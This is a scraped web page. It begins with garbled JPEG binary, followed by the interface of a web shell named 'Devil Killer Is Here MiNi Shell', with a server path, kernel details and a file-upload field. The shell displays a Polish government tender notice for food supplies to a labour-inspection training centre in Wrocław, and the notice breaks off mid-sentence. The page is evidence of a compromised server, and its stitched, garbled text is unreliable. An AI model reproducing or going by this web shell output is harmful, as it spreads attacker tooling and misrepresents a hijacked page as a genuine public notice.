JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240529/0034467501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP według 7 części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK SZKOLENIA PAŃSTWOWEJ INSPEKCJI PRACY IM. PROFESORA JANA ROSNERA WE WROCŁAWIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 021409520</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mikołaja Kopernika 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">51-622</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@os.pip.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.os.pip.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna Państwowej Inspekcji Pracy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Szkolenie i doskonalenie kadr Państwowej Inspekcji Pracy oraz upowszechnianie wiedzy i informacji, a także doradztwo w zakresie ochrony pracy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP według 7 części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ad51d25a-1cdf-11ef-a7c1-72acb4a2af8f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00344675</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00218462/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ad51d25a-1cdf-11ef-a7c1-72acb4a2af8f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe inf. na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia<br/>określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz inf. zamieszczone w<br/>zakładce „Centrum Pomocy”.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. Szczegółowe informacje dot. wymagań technicznych i<br/>organizacyjnych dot. korespondencji elektronicznej znajdują się w rozdziale VI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, ze zm.) dalej RODO, informujemy:<br/>1.	Administratorem Pani/Pana danych osobowych jest Ośrodek Szkolenia Państwowej Inspekcji Pracy im. Profesora Jana Rosnera we Wrocławiu (dalej OSPIP)<br/>2.	Kontakt: Ośrodek Szkolenia Państwowej Inspekcji Pracy im. Profesora Jana Rosnera, ul. Kopernika 5, 51-622 Wrocław, e-mail kancelaria@os.pip.gov.pl, tel. 71 37-10-409<br/>3.	Administrator powołał Inspektora Ochrony Danych Osobowych, z którym kontaktować się można na adres e-mail: iod@os.pip.gov.pl<br/>4.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji<br/>5.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp oraz Prezes Urzędu Zamówień Publicznych z siedzibą w Warszawie (02-676) przy ul. Postępu 17A jako Administrator Danych Osobowych Użytkowników Platformy e-Zamówienia, na której OSPIP prowadzi postępowania o udzielenie zamówienia publicznego pod adresem: <br/>https://ezamowienia.gov.pl/pl/<br/>6.	Pani/Pana dane osobowe w przypadku postępowań o udzielenie zamówienia publicznego będą przechowywane przez okres wskazany w instrukcji kancelaryjnej OSPIP<br/>7.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w ustawie Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp<br/>8.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO<br/>9.	W stosunku do Pani/Pana danych osobowych posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników<br/>	na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>	prawo do wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych, tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie Pani/Pana danych osobowych narusza przepisy RODO.<br/>10.	Nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO <br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, <br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OS-DOP-ZP.213.79.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 748185,72 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP według 7 części:<br/>CZĘŚĆ 1 – Artykuły ogólnospożywcze oraz woda mineralna.<br/>Powyższy przedmiot zamówienia został wykazany i opisany w załączniku nr 1 do SWZ.<br/>2. W ramach przedmiotu zamówienia wykonawca zobowiązany jest do dostawy artykułów spożywczych do siedziby Zamawiającego we Wrocławiu przy ul. Mikołaja Kopernika 9.<br/>Wydawanie zakupionych artykułów odbywać się będzie w siedzibie Zamawiającego w godzinach od 6:00 do 12:00 tego<br/>samego lub następnego dnia po złożeniu zamówienia za pośrednictwem poczty elektronicznej (e-mail) lub telefonu.<br/>Zamawiający i Wykonawca mogą zgodnie zmienić termin i czas wydawania artykułów w przypadku konkretnych zamówień, w zależności od potrzeb i sytuacji nieprzewidzianych.<br/>Zamawiający będzie realizował zakup artykułów średnio dwa razy w tygodniu. Zamawiający zastrzega, że będzie także<br/>realizował zakupy w sytuacjach nieprzewidzianych (np. w soboty).<br/>Wszelkie koszty transportu, wyładunku, wydania towaru oraz jego ubezpieczenia na czas transportu do siedziby Zamawiającego ponosi Wykonawca.<br/>Dostarczone artykuły muszą się charakteryzować bieżącą przydatnością do spożycia oraz spełniać wymogi określone w opisie produktu wskazanym w załączniku nr 1 do umowy.<br/>3. Szczegółowe warunki realizacji przedmiotowego zamówienia zawiera projekt umowy wraz załącznikami, stanowiące integralną część SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 152564,88 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15981000-8 - Wody mineralne</p> <p class="mb-0">15321000-4 - Soki owocowe</p> <p class="mb-0">15331400-1 - Warzywa konserwowane i/lub puszkowane</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15871000-4 - Ocet; sosy; mieszanki przypraw; mąka i mączka z gorczycy; gotowa musztarda</p> <p class="mb-0">15860000-4 - Kawa, herbata i podobne produkty</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <p class="mb-0">15851000-8 - Produkty mączne</p> <p class="mb-0">15842000-2 - Czekolada i wyroby cukiernicze</p> <p class="mb-0">15871230-5 - Ketchup</p> <p class="mb-0">15871273-8 - Majonez</p> <p class="mb-0">15831000-2 - Cukier</p> <p class="mb-0">15613000-8 - Produkty z ziaren zbóż</p> <p class="mb-0">15872400-5 - Sól</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 31 ust. 2 i art. 441 ust. 1 ustawy Pzp. Prawem opcji jest możliwość zwiększenia dostaw na warunkach zawartej umowy do 20% zamówienia podstawowego. W ramach opcjonalnych 20% Zamawiający zastrzega sobie możliwość zwiększenia dostaw artykułów spożywczych wymienionych w załączniku nr 1 lub zamówienia artykułów <br/>z danego asortymentu niewymienionych w formularzu asortymentowo-cenowym – przykładowe artykuły spożywcze dla każdej części zostały wymienione w załączniku nr 1. W przypadku zwiększenia ilości artykułów wymienionych w załączniku nr 1, wykonawca zobowiązany jest utrzymać ceny jednostkowe zamówienia opcjonalnego na poziomie cen jednostkowych zamówienia podstawowego. W przypadku artykułów niewymienionych w załączniku nr 1, wykonawca realizuje zamówienie po zaakceptowaniu ceny danego artykułu przez Zamawiającego. Prawo opcji jest uprawnieniem zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem uruchomienia prawa opcji jest oświadczenie woli zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza dostawy artykułów spożywczych, stanowiących zamówienie podstawowe.<br/>UWAGA! Zmiany ceny brutto, o których mowa w ust. 1 paragrafu 5 projektu umowy, nie wpływają na wartość zamówienia z zakresu opcji, określoną w § 4 ust. 1 lit. b) projektu umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W postępowaniu Zamawiający zastosuje kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP według 7 części:<br/>CZĘŚĆ 2 – Mrożone artykuły ogólnospożywcze.<br/>Powyższy przedmiot zamówienia został wykazany i opisany w załączniku nr 1 do SWZ.<br/>2. W ramach przedmiotu zamówienia wykonawca zobowiązany jest do dostawy artykułów spożywczych do siedziby Zamawiającego we Wrocławiu przy ul. Mikołaja Kopernika 9.<br/>Wydawanie zakupionych artykułów odbywać się będzie w siedzibie Zamawiającego w godzinach od 6:00 do 12:00 tego samego lub następnego dnia po złożeniu zamówienia za pośrednictwem poczty elektronicznej (e-mail) lub telefonu.<br/>Zamawiający i Wykonawca mogą zgodnie zmienić termin i czas wydawania artykułów w przypadku konkretnych zamówień, w zależności od potrzeb i sytuacji nieprzewidzianych.<br/>Zamawiający będzie realizował zakup artykułów średnio dwa razy w tygodniu. Zamawiający zastrzega, że będzie także realizował zakupy w sytuacjach nieprzewidzianych (np. w soboty).<br/>Wszelkie koszty transportu, wyładunku, wydania towaru oraz jego ubezpieczenia na czas transportu do siedziby Zamawiającego ponosi Wykonawca.<br/>Dostarczone artykuły muszą się charakteryzować bieżącą przydatnością do spożycia oraz spełniać wymogi określone w opisie produktu wskazanym w załączniku nr 1 do umowy.<br/>3. Szczegółowe warunki realizacji przedmiotowego zamówienia zawiera projekt umowy wraz załącznikami, stanowiące integralną część SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 75859,92 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15311100-2 - Chipsy i frytki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 31 ust. 2 i art. 441 ust. 1 ustawy Pzp. Prawem opcji jest możliwość zwiększenia dostaw na warunkach zawartej umowy do 20% zamówienia podstawowego. W ramach opcjonalnych 20% Zamawiający zastrzega sobie możliwość zwiększenia dostaw artykułów spożywczych wymienionych w załączniku nr 1 lub zamówienia artykułów <br/>z danego asortymentu niewymienionych w formularzu asortymentowo-cenowym – przykładowe artykuły spożywcze dla każdej części zostały wymienione w załączniku nr 1. W przypadku zwiększenia ilości artykułów wymienionych w załączniku nr 1, wykonawca zobowiązany jest utrzymać ceny jednostkowe zamówienia opcjonalnego na poziomie cen jednostkowych zamówienia podstawowego. W przypadku artykułów niewymienionych w załączniku nr 1, wykonawca realizuje zamówienie po zaakceptowaniu ceny danego artykułu przez Zamawiającego. Prawo opcji jest uprawnieniem zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem uruchomienia prawa opcji jest oświadczenie woli zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza dostawy artykułów spożywczych, stanowiących zamówienie podstawowe.<br/>UWAGA! Zmiany ceny brutto, o których mowa w ust. 1 paragrafu 5 projektu umowy, nie wpływają na wartość zamówienia z zakresu opcji, określoną w § 4 ust. 1 lit. b) projektu umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W postępowaniu Zamawiający zastosuje kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych dla Ośrodka Szkolenia PIP według 7 części: CZĘŚĆ 3 – Nabiał i jaja. Powyższy przedmiot zamówienia został wykazany i opisany w załączniku nr 1 do SWZ. 2. W ramach przedmiotu zamówienia wykonawca zobowiązany jest do dostawy artykułów spożywczych do siedziby Zamawiającego we Wrocławiu przy ul. Mikołaja Kopernika 9. <br/>Wydawanie zakupionych artykułów odbywać się będzie w siedzibie Zamawiającego w godzinach od 6:00 do 12:00 tego samego lub następnego dnia po złożeniu zamówienia za pośrednictwem poczty elektronicznej (e-mail) lub telefonu. <br/>Zamawiający i Wykonawca mogą zgodnie zmienić termin i czas wydawania artykułów w przypadku konkretnych zamówień, w zależności od potrzeb i sytuacji nieprzewidzianych. <br/>Zamawiający będzie realizował zakup artykułów średnio dwa razy w tygodniu. Zamawiający zastrzega, że będzie także realizował zakupy w sytuacjach nieprzewidzianych (np. w soboty). <br/>Wszelkie koszty transportu, wyładunku, wydania towaru oraz jego ubezpieczenia na czas transportu do siedziby Zamawiającego ponosi Wykonawca. <br/>Dostarczone artykuły muszą 